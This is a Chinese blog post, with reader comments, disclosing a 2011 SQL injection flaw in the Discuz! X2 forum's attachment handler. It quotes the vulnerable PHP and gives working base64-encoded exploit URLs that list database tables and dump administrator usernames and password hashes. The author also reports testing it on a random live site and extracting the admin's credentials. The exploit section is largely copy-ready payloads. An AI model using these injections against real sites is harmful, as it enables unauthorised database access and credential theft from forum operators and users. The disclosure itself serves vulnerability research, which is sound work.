Discuz! X2 SQL注射漏洞 (20110629)

来自岁月联盟猪猪的博客: http://blog.syue.com/post/148.html

详细:
if(!defined(‘IN_DISCUZ’)) {
exit(‘Access Denied’);
}
define(‘NOROBOT’, TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode(‘|’, base64_decode($_G['gp_aid']));

if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first(“SELECT pid, tid FROM “.DB::table(‘forum_attachment’).” WHERE aid=’$_G[gp_aid]‘”))) {
dheader(‘location: forum.php?mod=redirect&goto=findpost&pid=’.$attach['pid'].’&ptid=’.$attach['tid']);
}

变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。

http://www.xxxx.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D

转向后网址

http://www.xxxx.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member

暴出表名 pre_common_admincp_member

实际查询为:

$x=”1′ and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like ‘%_member|x|x|x|x”;
//die (urlencode(base64_encode($x)));

在dz官网论坛看到有人已经发了exp:

Discuz! X2.0 SQL注入漏洞 EXP

DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D

随便拿了个站测试一下,管理员的用户名和密码hash果断暴出:

dz官方已经发布:补丁

更多
3 Responses Post a comment
  1. 荒野无灯

    估计是急着推出新版本,没有仔细审核源码安全

  2. 一苇

    好可怕,DZ这次升级怎么会出现这么大的漏洞?影响很不好额

Leave a Reply

Note: You may use basic HTML in your comments. Your email address will not be published.

Subscribe to this comment feed via RSS